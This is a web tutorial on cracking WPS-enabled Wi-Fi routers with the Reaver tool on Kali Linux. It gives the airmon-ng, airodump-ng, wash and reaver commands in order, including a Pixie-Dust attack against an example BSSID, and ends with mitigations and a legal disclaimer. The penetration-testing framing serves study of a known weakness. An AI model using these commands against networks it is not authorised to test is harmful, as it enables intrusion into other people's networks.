What is Reaver?
“Reaver” in the context of Linux refers to a specific tool known as “Reaver-WPS.” Reaver is a popular open-source command-line tool used for performing brute-force attacks on WPS-enabled (Wi-Fi Protected Setup) routers.
Its primary purpose is to crack the WPA/WPA2 pre-shared key of a Wi-Fi network by exploiting the WPS vulnerability.
In this Kali Linux Tutorial, we are to work with Reaver. Reaver has been designed to be a handy and effective tool to attack Wi-Fi Protected Setup (WPS) register PINs keeping in mind the tip goal to recover WPA/WPA2 passphrases.
Presently hacking WPA/WPA2 is exceptionally a tedious job. A dictionary attack could take days, and still will not succeed.
WPS-functionality always stopped to work somewhere between 2 and 150 failed authentication attempts. The functionality did not even return after several hours. I would consider this a bug in the firmware which causes a DoS rather than lock-down functionality. Researchers said.
All major suppliers (counting Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL, and Technicolor) have WPS-affirmed gadgets, completely different sellers (eg. TP-Link) send gadgets with WPS support that aren’t WPS-certified.WPS is enabled default by all devices.
Also Read Aircrack-ng (WiFI Password Cracker)
Penetration testing with Reaver – Kali Linux Tutorial
First, we should set up our Wireless device in Monitoring mode.
airmon-ng start wlan0
You should notice for the device is set up in the Monitor mode wlan0mon.
airodump-ng wlan0mon
Now we can see the BSSID of the devices that are near us and you can also use wash -i wlan0mon to display all WPS-enabled WiFi networks.
We have gathered all the required information, now time to attack from Reaver.
reaver -i wlan0mon -b DC:EF:09:17:9A:2C –vvv -K 1
-i Indicates interface
-b BSSID of the target AP
-v verbose
-K Run pixiewps
It will go on scanning with all WPS pins available.
If it finds a matching PIN it will go and be exploiting it.
Mitigations
- Enable MAC address filtering.
- Disable WPS.
- Physically Protect the Router.
Disclaimer
This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.Misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.gbhackers.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Also Read Kickout Devices Out of Your Network and Enjoy all the Bandwidth